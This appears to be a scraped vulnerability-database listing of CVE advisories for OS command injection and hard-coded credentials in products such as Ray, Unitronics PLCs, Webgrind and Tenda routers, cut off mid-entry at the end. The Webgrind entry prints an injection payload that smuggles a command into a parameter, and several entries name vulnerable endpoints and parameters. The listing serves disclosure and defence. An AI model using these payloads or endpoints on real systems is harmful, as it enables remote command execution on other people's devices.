CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-6019
Matching Score-4
Assigner-Protect AI (formerly huntr.dev)
ShareView Details
Matching Score-4
Assigner-Protect AI (formerly huntr.dev)
CVSS Score-9.8||CRITICAL
EPSS-88.77% / 99.52%
||
7 Day CHG~0.00%
Published-16 Nov, 2023 | 16:12
Updated-02 Aug, 2024 | 08:21
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Ray Command Injection in cpu_profile Parameter

A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023

Action-Not Available
Vendor-ray_projectray-project
Product-rayray-project/ray
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-6448
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) U.S. Civilian Government
ShareView Details
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) U.S. Civilian Government
CVSS Score-9.8||CRITICAL
EPSS-13.29% / 94.19%
||
7 Day CHG~0.00%
Published-05 Dec, 2023 | 17:43
Updated-26 Feb, 2026 | 15:04
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Known KEV||Action Due Date - 2023-12-18||Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Unitronics VisiLogic uses a default administrative password

Unitronics VisiLogic before version 9.9.00, used in Vision and Samba PLCs and HMIs, uses a default administrative password. An unauthenticated attacker with network access can take administrative control of a vulnerable system.

Action-Not Available
Vendor-Unitronics PLC
Product-vision430vision120_firmwaresamba_4.3samba_3.5_firmwarevision280vision570vision430_firmwarevision280_firmwarevision700vision350vision230_firmwaresamba_7_firmwarevision130vision700_firmwarevision1040_firmwarevision130_firmwarevisilogicvision1210vision230samba_3.5vision560vision1040vision290vision1210_firmwarevision570_firmwarevision530_firmwaresamba_7vision530vision560_firmwaresamba_4.3_firmwarevision120vision290_firmwarevision350_firmwareVisiLogicvisilogicVision PLC and HMI
CWE ID-CWE-1188
Initialization of a Resource with an Insecure Default
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2020-36911
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-9.3||CRITICAL
EPSS-0.86% / 75.06%
||
7 Day CHG~0.00%
Published-13 Jan, 2026 | 22:51
Updated-05 Mar, 2026 | 01:26
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Covenant 0.5 - Remote Code Execution (RCE)

Covenant 0.1.3 - 0.5 contains a remote code execution vulnerability that allows attackers to craft malicious JWT tokens with administrative privileges. Attackers can generate forged tokens with admin roles and upload custom DLL payloads to execute arbitrary commands on the target system.

Action-Not Available
Vendor-cobbrCobbr
Product-covenantCovenant
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2020-36376
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-1.12% / 78.32%
||
7 Day CHG~0.00%
Published-31 Oct, 2021 | 19:51
Updated-04 Aug, 2024 | 17:23
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

An issue was discovered in the list function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.

Action-Not Available
Vendor-aaptjs_projectn/a
Product-aaptjsn/a
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-6309
Matching Score-4
Assigner-VulDB
ShareView Details
Matching Score-4
Assigner-VulDB
CVSS Score-5.5||MEDIUM
EPSS-2.61% / 85.71%
||
7 Day CHG~0.00%
Published-27 Nov, 2023 | 01:31
Updated-10 Oct, 2024 | 20:27
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
moses-smt mosesdecoder trans_result.php os command injection

A vulnerability, which was classified as critical, was found in moses-smt mosesdecoder up to 4.0. This affects an unknown part of the file contrib/iSenWeb/trans_result.php. The manipulation of the argument input1 leads to os command injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246135.

Action-Not Available
Vendor-moses-smtmoses-smt
Product-mosesdecodermosesdecoder
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-6078
Matching Score-4
Assigner-Dassault Systèmes
ShareView Details
Matching Score-4
Assigner-Dassault Systèmes
CVSS Score-8.8||HIGH
EPSS-0.34% / 56.81%
||
7 Day CHG~0.00%
Published-01 Feb, 2024 | 13:33
Updated-09 Jun, 2025 | 20:37
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
OS Command Injection vulnerability affecting BIOVIA Materials Studio products from Release BIOVIA 2021 through Release BIOVIA 2023

An OS Command Injection vulnerability exists in BIOVIA Materials Studio products from Release BIOVIA 2021 through Release BIOVIA 2023. Upload of a specially crafted perl script can lead to arbitrary command execution.

Action-Not Available
Vendor-Dassault Systèmes S.E. (3DS)
Product-biovia_materials_studioBIOVIA Materials Studio products
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2022-30308
Matching Score-4
Assigner-CERT@VDE
ShareView Details
Matching Score-4
Assigner-CERT@VDE
CVSS Score-9.8||CRITICAL
EPSS-0.95% / 76.43%
||
7 Day CHG~0.00%
Published-13 Jun, 2022 | 13:45
Updated-16 Sep, 2024 | 23:15
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
FESTO: CECC-X-M1 and Servo Press Kit YJKP OS Command Injection vulnerability

In Festo Controller CECC-X-M1 product family in multiple versions, the http-endpoint "cecc-x-web-viewer-request-on" POST request doesn’t check for port syntax. This can result in unauthorized execution of system commands with root privileges due to improper access control command injection.

Action-Not Available
Vendor-festoFesto
Product-controller_cecc-x-m1-mv-s1controller_cecc-x-m1controller_cecc-x-m1-ys-l2_firmwareservo_press_kit_yjkp_firmwareservo_press_kit_yjkp-controller_cecc-x-m1-ys-l1_firmwareservo_press_kit_yjkpcontroller_cecc-x-m1-mv_firmwarecontroller_cecc-x-m1-y-yjkpcontroller_cecc-x-m1-ys-l2controller_cecc-x-m1-mvcontroller_cecc-x-m1_firmwareservo_press_kit_yjkp-_firmwarecontroller_cecc-x-m1-y-yjkp_firmwarecontroller_cecc-x-m1-ys-l1controller_cecc-x-m1-mv-s1_firmwareController CECC-X-M1-MV (4407605)Controller CECC-X-M1-Y-YJKP (4803891)Controller CECC-X-M1 (8124922)Controller CECC-X-M1-MV-S1 (4407606)Controller CECC-X-M1-YS-L1 (8082793)Controller CECC-X-M1-MV (8124923)Controller CECC-X-M1-MV-S1 (8124924)Controller CECC-X-M1-YS-L2 (8082794)Servo Press Kit YJKP (8077950)Servo Press Kit YJKP- (8058596)Controller CECC-X-M1 (4407603)
CWE ID-CWE-863
Incorrect Authorization
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2025-34198
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-9.3||CRITICAL
EPSS-0.23% / 45.16%
||
7 Day CHG~0.00%
Published-19 Sep, 2025 | 18:40
Updated-17 Nov, 2025 | 23:56
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Vasion Print (formerly PrinterLogic) Shared / Hardcoded SSH Host Private Keys in Appliance Image

Vasion Print (formerly PrinterLogic) Virtual Appliance Host versions prior to 22.0.951 and Application prior to 20.0.2368 (VA and SaaS deployments) contain shared, hardcoded SSH host private keys in the appliance image. The same private host keys (RSA, ECDSA, and ED25519) are present across installations, rather than being uniquely generated per appliance. An attacker who obtains these private keys (for example from one compromised appliance image or another installation) can impersonate the appliance, decrypt or intercept SSH connections to appliances that use the same keys, and perform man-in-the-middle or impersonation attacks against administrative SSH sessions. This vulnerability has been identified by the vendor as: V-2024-011 — Hardcoded SSH Host Key.

Action-Not Available
Vendor-vasionVasion
Product-virtual_appliance_applicationvirtual_appliance_hostPrint Virtual Appliance HostPrint Application
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2020-36379
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-1.12% / 78.32%
||
7 Day CHG~0.00%
Published-31 Oct, 2021 | 19:51
Updated-04 Aug, 2024 | 17:23
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

An issue was discovered in the remove function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.

Action-Not Available
Vendor-aaptjs_projectn/a
Product-aaptjsn/a
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-6901
Matching Score-4
Assigner-VulDB
ShareView Details
Matching Score-4
Assigner-VulDB
CVSS Score-7.3||HIGH
EPSS-0.64% / 70.56%
||
7 Day CHG~0.00%
Published-17 Dec, 2023 | 14:00
Updated-02 Aug, 2024 | 08:42
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
codelyfe Stupid Simple CMS HTTP POST Request handle-command.php os command injection

A vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259.

Action-Not Available
Vendor-codelyfecodelyfe
Product-stupid_simple_cmsStupid Simple CMS
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2025-33089
Matching Score-4
Assigner-IBM Corporation
ShareView Details
Matching Score-4
Assigner-IBM Corporation
CVSS Score-6.5||MEDIUM
EPSS-0.05% / 16.51%
||
7 Day CHG~0.00%
Published-17 Feb, 2026 | 18:59
Updated-06 Mar, 2026 | 15:36
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Multiple Vulnerabilities in IBM Concert Software.

IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information or perform unauthorized actions due to the use of hard coded user credentials.

Action-Not Available
Vendor-IBM Corporation
Product-concertConcert
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2020-36377
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-1.12% / 78.32%
||
7 Day CHG~0.00%
Published-31 Oct, 2021 | 19:51
Updated-04 Aug, 2024 | 17:23
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

An issue was discovered in the dump function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.

Action-Not Available
Vendor-aaptjs_projectn/a
Product-aaptjsn/a
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-5456
Matching Score-4
Assigner-Nozomi Networks Inc.
ShareView Details
Matching Score-4
Assigner-Nozomi Networks Inc.
CVSS Score-8.1||HIGH
EPSS-0.60% / 69.46%
||
7 Day CHG~0.00%
Published-05 Mar, 2024 | 11:10
Updated-10 Apr, 2025 | 20:49
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

A CWE-798 “Use of Hard-coded Credentials” vulnerability in the MariaDB database of the web application allows a remote unauthenticated attacker to access the database service and all included data with the same privileges of the web application. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.

Action-Not Available
Vendor-ailuxAiLuxailux
Product-imx6imx6 bundleimx6_bundle
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2023-53948
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-9.3||CRITICAL
EPSS-0.48% / 64.97%
||
7 Day CHG~0.00%
Published-19 Dec, 2025 | 21:05
Updated-07 Apr, 2026 | 14:08
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Lilac-Reloaded for Nagios 2.0.8 Remote Code Execution via Autodiscovery

Lilac-Reloaded for Nagios 2.0.8 contains a remote code execution vulnerability in the autodiscovery feature that allows attackers to inject arbitrary commands. Attackers can exploit the lack of input filtering in the nmap_binary parameter to execute a reverse shell by sending a crafted POST request to the autodiscovery endpoint.

Action-Not Available
Vendor-cat03
Product-Lilac-Reloaded
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-53963
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-9.3||CRITICAL
EPSS-2.90% / 86.41%
||
7 Day CHG~0.00%
Published-22 Dec, 2025 | 21:37
Updated-13 Jan, 2026 | 15:42
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Unauthenticated Remote Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary shell commands through the 'password' parameter. Attackers can exploit the login.php and index.php scripts by injecting shell commands via the 'password' POST parameter to execute commands with web server privileges.

Action-Not Available
Vendor-sound4Kantar MediaSOUND4 Ltd.
Product-wm2_firmwarepulse_eco_firmwareimpact_ecowm2pulseimpact_eco_firmwarefirstimpact_firmwarebig_voice2_firmwarefirst_firmwarepulse_ecostream_extensionimpactpulse_firmwarebig_voice4_firmwarebig_voice2big_voice4Impact/Pulse EcoWM2BigVoice4StreamImpact/Pulse/FirstBigVoice2
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-5684
Matching Score-4
Assigner-VulDB
ShareView Details
Matching Score-4
Assigner-VulDB
CVSS Score-4.7||MEDIUM
EPSS-8.62% / 92.46%
||
7 Day CHG+0.68%
Published-21 Oct, 2023 | 07:00
Updated-12 Sep, 2024 | 14:34
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Byzoro Smart S85F Management Platform importexport.php os command injection

A vulnerability was found in Byzoro Smart S85F Management Platform up to 20231012. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /importexport.php. The manipulation leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-243061 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Action-Not Available
Vendor-byzoroByzorobyzoro
Product-smart_s85f_firmwaresmart_s85fSmart S85F Management Platformsmart_s85f_management_platform
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2020-37012
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-9.3||CRITICAL
EPSS-0.30% / 53.43%
||
7 Day CHG~0.00%
Published-29 Jan, 2026 | 14:28
Updated-29 Jan, 2026 | 17:16
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Tea LaTex 1.0 - Remote Code Execution

Tea LaTex 1.0 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary shell commands through the /api.php endpoint. Attackers can craft a malicious LaTeX payload with shell commands that are executed when processed by the application's tex2png API action.

Action-Not Available
Vendor-ammarfaizi2
Product-Tea LaTex
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2020-37027
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-9.3||CRITICAL
EPSS-0.73% / 72.70%
||
7 Day CHG~0.00%
Published-30 Jan, 2026 | 22:07
Updated-04 Feb, 2026 | 16:34
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Sickbeard 0.1 - Remote Command Injection

Sickbeard alpha contains a remote command injection vulnerability that allows unauthenticated attackers to execute arbitrary commands through the extra scripts configuration. Attackers can set malicious commands in the extra scripts field and trigger processing to execute remote code on the vulnerable Sickbeard installation.

Action-Not Available
Vendor-midgetspy
Product-Sickbeard
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-53983
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-9.3||CRITICAL
EPSS-0.67% / 71.46%
||
7 Day CHG+0.09%
Published-30 Dec, 2025 | 22:41
Updated-16 Jan, 2026 | 19:16
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Anevia Flamingo XL/XS 3.6.20 Default Credentials Authentication Bypass

Anevia Flamingo XL/XS 3.6.20 contains a critical vulnerability with weak default administrative credentials that can be easily guessed. Attackers can leverage these hard-coded credentials to gain full remote system control without complex authentication mechanisms.

Action-Not Available
Vendor-atemeAteme
Product-soapsystemflamingo_xs_firmwareflamingo_xl_firmwareflamingo_xlflamingo_xssoapliveSoapSystemSoapLiveAnevia Flamingo XL/XS
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2008-0961
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-2.28% / 84.75%
||
7 Day CHG~0.00%
Published-14 Apr, 2008 | 16:00
Updated-23 Apr, 2026 | 00:35
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

EMV DiskXtender 6.20.060 has a hard-coded login and password, which allows remote attackers to bypass authentication via the RPC interface.

Action-Not Available
Vendor-n/aELAN Microelectronics Corporation
Product-diskxtendern/a
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2023-54339
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-9.3||CRITICAL
EPSS-0.73% / 72.82%
||
7 Day CHG~0.00%
Published-13 Jan, 2026 | 22:52
Updated-05 Mar, 2026 | 01:29
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Webgrind 1.1 - Remote Command Execution (RCE) via dataFile Parameter

Webgrind 1.1 contains a remote command execution vulnerability that allows unauthenticated attackers to inject OS commands via the dataFile parameter in index.php. Attackers can execute arbitrary system commands by manipulating the dataFile parameter, such as using payload '0%27%26calc.exe%26%27' to execute commands on the target system.

Action-Not Available
Vendor-webgrind_projectjokkedk
Product-webgrindWebgrind
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-53941
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-9.3||CRITICAL
EPSS-70.52% / 98.71%
||
7 Day CHG~0.00%
Published-18 Dec, 2025 | 19:53
Updated-07 Apr, 2026 | 14:07
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
EasyPHP Webserver 14.1 Remote Code Execution

EasyPHP Webserver 14.1 contains an OS command injection vulnerability that allows unauthenticated attackers to execute arbitrary system commands by injecting malicious payloads through the app_service_control parameter. Attackers can send POST requests to /index.php?zone=settings with crafted app_service_control values to execute commands with administrative privileges.

Action-Not Available
Vendor-easyphpEasyphp
Product-webserverEasyPHP Webserver
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2022-3183
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) Industrial Control Systems (ICS)
ShareView Details
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) Industrial Control Systems (ICS)
CVSS Score-9.8||CRITICAL
EPSS-1.12% / 78.32%
||
7 Day CHG~0.00%
Published-21 Dec, 2022 | 22:24
Updated-15 Apr, 2025 | 19:36
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

Dataprobe iBoot-PDU FW versions prior to 1.42.06162022 contain a vulnerability where a specific function does not sanitize the input provided by the user, which may expose the affected to an OS command injection vulnerability.

Action-Not Available
Vendor-Dataprobe, Inc.
Product-iboot-pdu8sa-2n15_firmwareiboot-pdu4a-n15iboot-pdu4sa-n20iboot-pdu4sa-n15iboot-pdu4a-n20_firmwareiboot-pdu8a-2n15iboot-pdu4-n20iboot-pdu8a-n20iboot-pdu8sa-n20iboot-pdu4a-n20iboot-pdu8a-2n15_firmwareiboot-pdu8sa-n20_firmwareiboot-pdu8a-n20_firmwareiboot-pdu8a-2n20iboot-pdu4a-n15_firmwareiboot-pdu8a-n15_firmwareiboot-pdu4sa-n20_firmwareiboot-pdu8sa-2n15iboot-pdu8sa-n15_firmwareiboot-pdu4sa-n15_firmwareiboot-pdu4-n20_firmwareiboot-pdu8a-2n20_firmwareiboot-pdu8sa-n15iboot-pdu8a-n15iBoot-PDU FW
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2020-36380
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-1.20% / 79.02%
||
7 Day CHG~0.00%
Published-31 Oct, 2021 | 19:51
Updated-04 Aug, 2024 | 17:23
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

An issue was discovered in the crunch function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.

Action-Not Available
Vendor-aaptjs_projectn/a
Product-aaptjsn/a
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2022-30329
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-0.78% / 73.68%
||
7 Day CHG~0.00%
Published-16 Jun, 2022 | 22:04
Updated-03 Aug, 2024 | 06:48
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

An issue was found on TRENDnet TEW-831DR 1.0 601.130.1.1356 devices. An OS injection vulnerability exists within the web interface, allowing an attacker with valid credentials to execute arbitrary shell commands.

Action-Not Available
Vendor-n/aTRENDnet, Inc.
Product-tew-831dr_firmwaretew-831drn/a
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2020-36199
Matching Score-4
Assigner-Kaspersky
ShareView Details
Matching Score-4
Assigner-Kaspersky
CVSS Score-9.8||CRITICAL
EPSS-6.02% / 90.76%
||
7 Day CHG~0.00%
Published-21 Jan, 2021 | 21:20
Updated-04 Aug, 2024 | 17:23
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

TinyCheck before commits 9fd360d and ea53de8 was vulnerable to command injection due to insufficient checks of input parameters in several places.

Action-Not Available
Vendor-n/aKaspersky Lab
Product-tinycheckKaspersky TinyCheck
CWE ID-CWE-20
Improper Input Validation
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2026-7155
Matching Score-4
Assigner-VulDB
ShareView Details
Matching Score-4
Assigner-VulDB
CVSS Score-9.3||CRITICAL
EPSS-1.25% / 79.46%
||
7 Day CHG+0.36%
Published-27 Apr, 2026 | 20:15
Updated-28 Apr, 2026 | 14:47
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Totolink A8000RU CGI cstecgi.cgi setLoginPasswordCfg os command injection

A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setLoginPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument admpass leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.

Action-Not Available
Vendor-TOTOLINK
Product-A8000RU
CWE ID-CWE-77
Improper Neutralization of Special Elements used in a Command ('Command Injection')
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2020-37123
Matching Score-4
Assigner-VulnCheck
ShareView Details
Matching Score-4
Assigner-VulnCheck
CVSS Score-9.3||CRITICAL
EPSS-16.55% / 94.93%
||
7 Day CHG~0.00%
Published-05 Feb, 2026 | 16:13
Updated-06 Feb, 2026 | 20:34
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Pinger 1.0 - Remote Code Execution

Pinger 1.0 contains a remote code execution vulnerability that allows attackers to inject shell commands through the ping and socket parameters. Attackers can exploit the unsanitized input in ping.php to write arbitrary PHP files and execute system commands by appending shell metacharacters.

Action-Not Available
Vendor-wcchandler
Product-Pinger
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2022-3214
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) Industrial Control Systems (ICS)
ShareView Details
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) Industrial Control Systems (ICS)
CVSS Score-9.8||CRITICAL
EPSS-4.85% / 89.58%
||
7 Day CHG~0.00%
Published-16 Sep, 2022 | 18:05
Updated-25 Feb, 2026 | 16:21
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
Delta Electronics DIAEnergy Use of Hard-coded Credentials

Delta Industrial Automation's DIAEnergy, an industrial energy management system, is vulnerable to CWE-798, Use of Hard-coded Credentials. Versions prior to  1.9.03.009 have this vulnerability. Executable files could be uploaded to certain directories using hard-coded bearer authorization, allowing remote code execution.

Action-Not Available
Vendor-Delta Electronics, Inc.
Product-diaenergieDIAEnergy
CWE ID-CWE-798
Use of Hard-coded Credentials
CVE-2022-31446
Matching Score-4
Assigner-MITRE Corporation
ShareView Details
Matching Score-4
Assigner-MITRE Corporation
CVSS Score-9.8||CRITICAL
EPSS-17.70% / 95.14%
||
7 Day CHG~0.00%
Published-14 Jun, 2022 | 02:41
Updated-03 Aug, 2024 | 07:19
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available

Tenda AC18 router V15.03.05.19 and V15.03.05.05 was discovered to contain a remote code execution (RCE) vulnerability via the Mac parameter at ip/goform/WriteFacMac.

Action-Not Available
Vendor-n/aTenda Technology Co., Ltd.
Product-ac18_firmwareac18n/a
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2022-3089
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) Industrial Control Systems (ICS)
ShareView Details
Matching Score-4
Assigner-Cybersecurity and Infrastructure Security Agency (CISA) Industrial Control Systems (ICS)
CVSS Score-6.3||MEDIUM
EPSS-0.07% / 22.23%
||
7 Day CHG~0.00%
Published-13 Feb, 2023 | 16:28
Updated-07 Nov, 2023 | 03:50
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
EnOcean SmartServer Hard-coded credentials

Echelon SmartServer 2.2 with i.LON Vision 2.2 stores cleartext credentials in a file, which could allow an attacker to obtain cleartext usernames and passwords of the SmartServer. If the attacker obtains the file, then the credentials could be used to control the web user interface and file transfer protocol (FTP) server.

Action-Not Available
Vendor-echelonEnOcean
Product-i.lon_visionsmartserverSmartserver
CWE ID-CWE-798
Use of Hard-coded Credentials
CWE ID-CWE-312
Cleartext Storage of Sensitive Information
CVE-2022-31249
Matching Score-4
Assigner-SUSE
ShareView Details
Matching Score-4
Assigner-SUSE
CVSS Score-7.5||HIGH
EPSS-1.22% / 79.12%
||
7 Day CHG~0.00%
Published-07 Feb, 2023 | 00:00
Updated-25 Mar, 2025 | 15:40
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
[RANCHER] OS command injection in Rancher and Fleet

A Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in wrangler of SUSE Rancher allows remote attackers to inject commands in the underlying host via crafted commands passed to Wrangler. This issue affects: SUSE Rancher wrangler version 0.7.3 and prior versions; wrangler version 0.8.4 and prior versions; wrangler version 1.0.0 and prior versions.

Action-Not Available
Vendor-SUSE
Product-wranglerRancher
CWE ID-CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2025-32002
Matching Score-4
Assigner-JPCERT/CC
ShareView Details
Matching Score-4
Assigner-JPCERT/CC
